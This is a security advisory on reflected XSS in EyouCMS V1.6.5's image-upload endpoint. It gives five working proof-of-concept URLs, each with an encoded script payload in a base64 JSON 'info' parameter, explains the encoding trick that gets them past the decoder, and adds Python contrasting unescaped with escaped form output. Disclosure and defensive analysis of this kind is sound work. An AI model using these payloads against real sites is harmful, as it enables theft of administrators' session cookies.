Summary
EyouCMS V1.6.5: when uploading images locally, the program uses the info parameter to set the parameters carried by the upload form.
Multiple reflected XSS vulnerabilities can be created by modifying the JWT-encoded HEADER of the accepted JSON data and setting the parameters it contains to malicious values.
These parameters are: num, input, path, func, is_water.
There is no update on GitHub; the latest installation package (V1.6.5) is:
https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip
Details
Exploiting this XSS vulnerability mainly consists of constructing the form so that it carries the parameters; the header is written directly into the page through an <input> element. If the info parameter contains a "-" after JWT encoding, it has to be replaced with a "+". The guess is that the developer implemented the URL encoding and decoding logic incorrectly, so that only "+" is accepted and not "-". This is probably because they only considered the standard URL encoding rules and ignored the URL-safe (base64url) encoding rules.
POC
HEADER: ALGORITHM & TOKEN TYPE:
Note: you do not need to carry any data when encoding; just encode the header with the corresponding parameter set, replace "-" with "+", and then URL-encode it. Don't do this in the wrong order, or the "+" will be converted to a space.
In Header, when the num parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the input parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the path parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the func parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
In Header, when the is_water parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=
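The following is an added example (not code from the report or from EyouCMS) that decodes the report's own num payload, contrasts a decoder that accepts only the standard base64 alphabet (the behaviour the report infers from the "-"/"+" swap) with one that also accepts base64url, and places the unescaped way of building the <input> elements next to an attribute-escaped version. The form layout, the function names and the assumption that the five fields are written straight into hidden inputs are mine, not EyouCMS's.

```python
import base64
import binascii
import html
import json
import urllib.parse

# Fields of the decoded "info" JSON that the report says are reflected into the form.
REFLECTED_FIELDS = ("num", "input", "path", "func", "is_water")

# The info= query value from the report's num payload, copied verbatim.
REPORT_INFO_NUM = "eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9"


def strict_decode(query_value):
    """Decoder that knows only the standard base64 alphabet ('+', '/'), the behaviour
    the report infers: a base64url value containing '-' is rejected (returns None)."""
    raw = urllib.parse.unquote(query_value)  # %2B -> '+'; unquote() leaves '+' alone
    raw += "=" * (-len(raw) % 4)             # JWT segments are sent without padding
    try:
        return json.loads(base64.b64decode(raw, validate=True))
    except (binascii.Error, ValueError):
        return None


def decode_info(query_value):
    """Tolerant decoder: maps the base64url alphabet onto the standard one first,
    so the '-' and '+' spellings of the same data are accepted alike."""
    raw = urllib.parse.unquote(query_value).replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)
    return json.loads(base64.b64decode(raw))


def render_form_vulnerable(info):
    """Assumed form layout: decoded values concatenated into <input> attributes
    without escaping, the pattern the report describes."""
    return "".join(
        f'<input type="hidden" name="{k}" value="{info.get(k, "")}">'
        for k in REFLECTED_FIELDS
    )


def render_form_hardened(info):
    """Same form, but every value is escaped for an HTML attribute context."""
    return "".join(
        f'<input type="hidden" name="{k}" value="{html.escape(str(info.get(k, "")))}">'
        for k in REFLECTED_FIELDS
    )
```

Swapping the "%2B" characters of the report's value for "-" yields the base64url spelling of the same header; strict_decode() rejects it while decode_info() returns the same JSON, which is exactly the asymmetry the report's note about replacing "-" with "+" describes.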
Impact
An administrator who is already logged in can have their cookie stolen after visiting the malicious URL.